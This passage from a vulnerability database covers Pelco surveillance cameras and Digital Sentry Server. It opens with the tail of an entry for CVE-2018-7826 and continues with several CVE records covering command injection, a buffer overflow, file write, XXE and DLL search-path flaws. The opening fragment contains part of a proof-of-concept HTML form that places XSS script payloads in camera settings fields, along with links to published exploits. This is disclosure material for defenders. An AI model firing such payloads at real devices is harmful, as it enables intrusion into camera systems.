name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7826",
"trust": 3.0
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16259",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"id": "VAR-201905-1050",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
}
]
},
"last_update_date": "2023-12-18T12:18:58.878000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Command Injection Vulnerability (CNVD-2019-16259)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162757"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92887"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7826"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7826"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2017-07-10T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"date": "2017-07-11T04:32:15",
"db": "PACKETSTORM",
"id": "143313"
},
{
"date": "2019-05-22T20:29:01.230000",
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"date": "2019-05-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"date": "2019-02-23T00:00:00",
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"date": "2017-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"date": "2019-06-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"date": "2019-06-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"date": "2019-05-28T12:59:00.237000",
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"date": "2019-05-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
],
"trust": 0.6
}
}
CVE-2021-27232 (GCVE-0-2021-27232)
Vulnerability from cvelistv5 – Published: 2021-02-16 14:28 – Updated: 2024-08-03 20:48
VLAI
Summary
The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:48:15.879Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-16T14:28:40.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27232",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The RTSPLive555.dll ActiveX control in Pelco Digital Sentry Server 7.18.72.11464 has a SetCameraConnectionParameter stack-based buffer overflow. This can be exploited by a remote attacker to potentially execute arbitrary attacker-supplied code. The victim would have to visit a malicious webpage using Internet Explorer where the exploit could be triggered."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server-RSTPLive555%20Activex%20Buffer%20overflow.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27232",
"datePublished": "2021-02-16T14:28:40.000Z",
"dateReserved": "2021-02-16T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:48:15.879Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-27197 (GCVE-0-2021-27197)
Vulnerability from cvelistv5 – Published: 2021-02-12 15:51 – Updated: 2024-08-03 20:40
VLAI
Summary
DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn't check if it's being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with "OBJECT classid=" and "<SCRIPT language='vbscript'>") to overwrite arbitrary files.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:40:47.574Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn\u0027t check if it\u0027s being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with \"OBJECT classid=\" and \"\u003cSCRIPT language=\u0027vbscript\u0027\u003e\") to overwrite arbitrary files."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-12T15:51:13.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27197",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "DSUtility.dll in Pelco Digital Sentry Server before 7.19.67 has an arbitrary file write vulnerability. The AppendToTextFile method doesn\u0027t check if it\u0027s being called from the application or from a malicious user. The vulnerability is triggered when a remote attacker crafts an HTML page (e.g., with \"OBJECT classid=\" and \"\u003cSCRIPT language=\u0027vbscript\u0027\u003e\") to overwrite arbitrary files."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server_AFW.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27197",
"datePublished": "2021-02-12T15:51:13.000Z",
"dateReserved": "2021-02-12T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:40:47.574Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-27184 (GCVE-0-2021-27184)
Vulnerability from cvelistv5 – Published: 2021-02-11 05:38 – Updated: 2024-08-03 20:40
VLAI
Summary
Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\Pelco directory) when DSControlPoint.exe is executed.
Severity
No CVSS data available.
CWE
- n/a
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://support.pelco.com/s/article/What-is-the-D… | x_refsource_MISC |
| https://github.com/vitorespf/Advisories/blob/mast… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T20:40:47.394Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\\Pelco directory) when DSControlPoint.exe is executed."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-02-11T05:38:19.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-27184",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Pelco Digital Sentry Server 7.18.72.11464 has an XML External Entity vulnerability (exploitable via the DTD parameter entities technique), resulting in disclosure and retrieval of arbitrary data on the affected node via an out-of-band (OOB) attack. The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the ControlPointCacheShare.xml file (in a %APPDATA%\\Pelco directory) when DSControlPoint.exe is executed."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history",
"refsource": "MISC",
"url": "https://support.pelco.com/s/article/What-is-the-Digital-Sentry-software-release-revision-history"
},
{
"name": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt",
"refsource": "MISC",
"url": "https://github.com/vitorespf/Advisories/blob/master/Pelco_Digital_Sentry_Server.txt"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2021-27184",
"datePublished": "2021-02-11T05:38:19.000Z",
"dateReserved": "2021-02-10T00:00:00.000Z",
"dateUpdated": "2024-08-03T20:40:47.394Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7816 (GCVE-0-2018-7816)
Vulnerability from cvelistv5 – Published: 2019-05-22 19:30 – Updated: 2024-08-05 06:37
VLAI
Summary
A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file.
Severity
No CVSS data available.
CWE
- Multiple Vulnerabilities
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/en/download/do… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| Pelco | Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ |
Affected:
Pelco Sarix Enhanced and Spectra Enhanced
Affected: Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ |
Date Public
2019-02-14 00:00
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T06:37:59.196Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ",
"vendor": "Pelco",
"versions": [
{
"status": "affected",
"version": "Pelco Sarix Enhanced and Spectra Enhanced"
},
{
"status": "affected",
"version": "Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ"
}
]
}
],
"datePublic": "2019-02-14T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Multiple Vulnerabilities",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2019-05-22T19:30:57.000Z",
"orgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"shortName": "schneider"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cybersecurity@schneider-electric.com",
"ID": "CVE-2018-7816",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Pelco Sarix Enhanced and Spectra Enhanced, Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ",
"version": {
"version_data": [
{
"version_value": "Pelco Sarix Enhanced and Spectra Enhanced"
},
{
"version_value": "Pelco Sarix Enhanced 1st generation and Spectra Enhanced PTZ"
}
]
}
}
]
},
"vendor_name": "Pelco"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A Permissions, Privileges, and Access Control vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to delete an arbitrary file."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Multiple Vulnerabilities"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/",
"refsource": "MISC",
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "076d1eb6-cfab-4401-b34d-6dfc2a413bdb",
"assignerShortName": "schneider",
"cveId": "CVE-2018-7816",
"datePublished": "2019-05-22T19:30:57.000Z",
"dateReserved": "2018-03-08T00:00:00.000Z",
"dateUpdated": "2024-08-05T06:37:59.196Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2018-7840 (GCVE-0-2018-7840)
Vulnerability from cvelistv5 – Published: 2019-05-22 19:24 – Updated: 2024-08-05 06:37
VLAI
Summary
A Uncontrolled Search Path Element (CWE-427) vulnerability exists in VideoXpert OpsCenter versions prior to 3.1 which could allow an attacker to cause the system to call an incorrect DLL.
Severity
No CVSS data available.
CWE
- Uncontrolled Search Path Element
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://www.schneider-electric.com/ww/en/download… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| VideoXpert | VideoXpert OpsCenter versions prior to 3.1 |
Affected:
